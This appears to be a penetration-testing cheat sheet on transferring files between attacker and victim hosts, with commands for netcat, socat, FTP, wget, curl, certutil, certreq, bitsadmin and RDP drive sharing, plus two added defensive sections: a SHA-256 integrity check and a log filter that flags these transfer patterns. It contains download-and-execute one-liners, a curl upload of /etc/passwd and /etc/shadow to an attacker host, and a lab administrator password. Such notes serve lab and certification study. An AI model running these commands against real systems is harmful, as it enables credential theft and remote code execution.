Binaries
Useful binaries for transferring files.
These binaries may not always exist on the target; however, we can still run them on the attacker host and receive the file on the target with something like bash.
Netcat
For this to work, the netcat binary needs to be installed on both systems.
# Set up a listener on the system you want to receive the file, specify a file name
└─$ nc -nvlp 4444 > mysecrets.txt
listening on [any] 4444 ...
# Send the file to the listening system, specifying the file to send
└─$ nc -nv 10.10.14.86 4444 < mysecrets.txt
# Another option that ends the connection after the file is fully sent
└─$ nc -q 0 10.10.14.86 4444 < mysecrets.txt
# The listening system should see this; exit out and view the file
└─$ nc -nvlp 4444 > mysecrets.txt
listening on [any] 4444 ...
connect to [10.10.14.86] from (UNKNOWN) [10.10.14.86] 43222
# View the file
└─$ cat mysecrets.txt
42
In case the victim restricts outbound traffic, we can use a port that is already open and may have fewer restrictions, such as 443.
# On the attacker, set up a listener and prepare a file to send
└─$ sudo nc -nvlp 443 -q 0 < test
# On the victim, connect to the attacker and download the file
└─$ nc 192.168.127.134 443 > test
Ncat
Not to be confused with netcat/nc. This updated version supports more features like SSL, SOCKS, HTTP proxies, and more.
# On the target, set up a listener to receive the file as test
ncat -nvlp 8000 --recv-only > test
# On the attacker, Send the file test to the remote host
ncat 192.168.127.134 8000 --send-only < test
In case the victim restricts outbound traffic, we can use a port that is already open and may have fewer restrictions, such as 443.
# On the attacker, set up a listener and prepare a file to send
sudo ncat -nvlp 443 --send-only < test
# On the victim, connect to the attacker and download the file
ncat 192.168.127.134 443 --recv-only > test
Socat
For this to work, the socat binary needs to be installed on both systems.
# Set up a listener on the system. Specify the file to send after a connection is made.
└─$ sudo socat TCP4-LISTEN:443,fork file:mysecrets.txt
# Connect to the listening system to download the file.
└─$ socat TCP4:10.10.14.86:443 file:received_mysecrets.txt,create
# View the file
└─$ cat received_mysecrets.txt
42
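The netcat, ncat and socat transfers above move raw bytes over TCP with no integrity check, so an early close (or a -q 0 that fires before the last bytes are flushed) silently truncates the received file. The following added example (not part of the original page) shows the check a practitioner runs after such a transfer: record size and SHA-256 on the sending side, then compare on the receiving side. The demo operates on local files only; the file names and contents are constructed.

```shell
#!/bin/sh
# Added example: verify that a file received over nc/ncat/socat arrived intact.
# Plain TCP transfers carry no integrity check, so compare size and SHA-256
# on both ends before trusting the received copy.

# Hash a file with whatever SHA-256 tool is available.
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Sender side: print "<size> <sha256>" to be compared on the receiver.
sender_fingerprint() {
    printf '%s %s\n' "$(wc -c < "$1" | tr -d ' ')" "$(file_sha256 "$1")"
}

# Receiver side: compare the received file against the sender's fingerprint.
# Prints "ok", "truncated" or "corrupt"; exit status is non-zero unless ok.
verify_transfer() {
    expected_size=$1; expected_hash=$2; received=$3
    actual_size=$(wc -c < "$received" | tr -d ' ')
    if [ "$actual_size" -ne "$expected_size" ]; then
        echo truncated; return 1
    fi
    if [ "$(file_sha256 "$received")" != "$expected_hash" ]; then
        echo corrupt; return 1
    fi
    echo ok
}

# Constructed demonstration on local files (no network transfer involved).
# Returns "ok truncated corrupt" for an intact copy, a short copy and a
# same-size copy with different bytes.
demo() {
    dir=$(mktemp -d)
    printf '42\n' > "$dir/mysecrets.txt"           # the file the page transfers
    set -- $(sender_fingerprint "$dir/mysecrets.txt")
    size=$1; hash=$2
    cp "$dir/mysecrets.txt" "$dir/received.txt"    # intact copy
    r1=$(verify_transfer "$size" "$hash" "$dir/received.txt") || true
    printf '4' > "$dir/short.txt"                  # simulate an early close
    r2=$(verify_transfer "$size" "$hash" "$dir/short.txt") || true
    printf '43\n' > "$dir/bad.txt"                 # same size, different bytes
    r3=$(verify_transfer "$size" "$hash" "$dir/bad.txt") || true
    rm -rf "$dir"
    echo "$r1 $r2 $r3"
}

demo
```

In practice, run sender_fingerprint on the sending host before the transfer and verify_transfer with its two output values on the receiving host afterwards; a "truncated" result is the usual symptom of closing the connection too early.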
FTP
This is a useful solution when we do not have an interactive shell on the victim. We can echo FTP commands into a file and then use the FTP client to run them against the FTP server.
# Echo the commands into a file (the first line creates it, the rest append to it)
C:\Users\victim> echo open 192.168.127.134 > ftpcommand.txt
C:\Users\victim> echo USER anonymous >> ftpcommand.txt
C:\Users\victim> echo binary >> ftpcommand.txt
# Upload a file
C:\Users\victim> echo PUT C:\Users\victim\windowsFile >> ftpcommand.txt
# Download a file
C:\Users\victim> echo GET /linuxfile >> ftpcommand.txt
C:\Users\victim> echo bye >> ftpcommand.txt
# Send the commands to the remote FTP server
C:\Users\victim> ftp -v -n -s:ftpcommand.txt
Wget
Warning: these write the file to disk on the target, which may lead to detection.
# Download a file (uppercase -O names the output file; lowercase -o would only redirect wget's log)
wget http://10.10.14.86/whoami.exe -O whoami.exe
# Download from web
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh
Fileless download. Execute it directly by piping into bash, python, etc.
# Download and immediately execute
wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3
Hello, World!
Curl
Warning: these write the file to disk on the target, which may lead to detection.
# Download a file
curl http://10.10.14.86/whoami.exe -o whoami.exe
# Download from web
curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Fileless download. Execute it directly by piping into bash, python, etc.
# Download and immediately execute
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash
Upload example.
# Upload multiple files. Use --insecure if connecting to an untrusted server (e.g., self-signed)
curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
SCP
This requires SSH to be enabled on the remote host.
# Download remote file to local host
scp remote-user@remote-host-ip:/path/to/file /local/path
# Upload local file to remote host
scp whoami.exe remote-user@remote-host-ip:/path/to/place/file
OpenSSL
# Generate a certificate
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
# Start the server
openssl s_server -quiet -accept 443 -cert certificate.pem -key key.pem < <nameOfFileToSend>
# Connect to the server and download the file
openssl s_client -connect 10.10.15.139:443 -quiet > <nameOfFileToReceive>
# If any errors here e.g., "verify error:num=18:self-signed certificate" it's due to
# the info added during the certificate generation. Leaving those items blank (.)
# resolves this e.g., "Email Address []:."
Certutil
Available on Windows. Requires hosting the file over HTTP on Kali.
# Download file.
certutil -split -f -urlcache http://10.10.14.16/winPEASx86.exe <optionalNewFileName>
Certreq
Available on Windows. Not every version supports the -Post parameter. Requires a listener to be set up on Kali.
# Upload a file to target
certreq.exe -Post -config http://<KALI IP>/ .\secrets.txt
Bitsadmin
Requires hosting the file with an HTTP or SMB server on Kali.
# Download file.
bitsadmin /transfer mytransferjob http://10.10.15.139/exploit C:\Users\user\Downloads\exploit
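The wget and curl sections warn that on-disk downloads may be detected, and certutil, certreq and bitsadmin are well-known living-off-the-land download tools. This added example (not part of the original page) shows the detection side: a small filter over process-creation log lines that flags the command-line patterns used in the sections above. The log lines are constructed for this example, reusing the commands and IP addresses shown on the page; the log format (host=, user=, cmd="...") is an assumption.

```shell
#!/bin/sh
# Added example: flag file-transfer and download-and-execute command lines
# in process-creation logs. SAMPLE_LOG is constructed; the commands inside it
# are the ones shown on the page, plus two benign lines that must not match.
SAMPLE_LOG='2024-05-01T09:12:03 host=WS01 user=victim cmd="certutil.exe -split -f -urlcache http://10.10.14.16/winPEASx86.exe"
2024-05-01T09:13:44 host=WS01 user=victim cmd="bitsadmin /transfer mytransferjob http://10.10.15.139/exploit C:\Users\user\Downloads\exploit"
2024-05-01T09:14:10 host=WS01 user=victim cmd="certreq.exe -Post -config http://10.10.14.16/ .\secrets.txt"
2024-05-01T09:15:27 host=LX01 user=www-data cmd="curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash"
2024-05-01T09:16:00 host=WS01 user=admin cmd="certutil.exe -verify signed.cer"
2024-05-01T09:17:31 host=LX01 user=deploy cmd="curl -o /tmp/release.tar.gz https://example.invalid/release.tar.gz"'

# Read log lines on stdin, print only those matching a transfer pattern.
# Case-insensitive so that -urlcache / -URLCache and -Post / -post both match;
# [^"]* keeps each pattern inside the quoted cmd="..." field.
flag_transfer_commands() {
    grep -Ei \
        -e 'certutil(\.exe)?[^"]*-urlcache' \
        -e 'bitsadmin(\.exe)?[^"]*/transfer' \
        -e 'certreq(\.exe)?[^"]*-post' \
        -e '(curl|wget)[^"]*[|][[:space:]]*(bash|sh|zsh|python[0-9.]*)'
}

# Reduce flagged lines to "<host> <user>" for triage.
flagged_principals() {
    sed -E 's/.*host=([^ ]+) user=([^ ]+).*/\1 \2/'
}

# Number of flagged lines in the constructed sample (expected: 4).
count_flagged() {
    printf '%s\n' "$SAMPLE_LOG" | flag_transfer_commands | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_LOG" | flag_transfer_commands | flagged_principals
```

Note that certutil -verify and a plain curl -o download are left alone: the patterns key on the URL-fetch and pipe-to-interpreter forms, not on the binary names, which keeps benign administrative use from flooding the queue.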
rdesktop
With rdesktop, we can copy/paste between hosts, but we can also mount a local folder and expose it to the RDP session. This folder is only exposed to this one RDP session.
The command below also starts the RDP session.
# On the linux attacker
rdesktop 192.168.127.134 -d coffee.lab -u administrator -p 'javaExpress1!' -r disk:linux='/home/kali/rdesktop/'
# On the windows victim, go to this path in explorer
\\tsclient\
xfreerdp
With xfreerdp, we can copy/paste between hosts, but we can also mount a local folder and expose it to the RDP session. This folder is only exposed to this one RDP session.
The command below also starts the RDP session.
# On the linux attacker
xfreerdp /v:192.168.127.134 /d:coffee.lab /u:administrator /p:'javaExpress1!' /drive:linux,/home/kali/xfreerdp
# On the windows victim, go to this path in explorer
\\tsclient\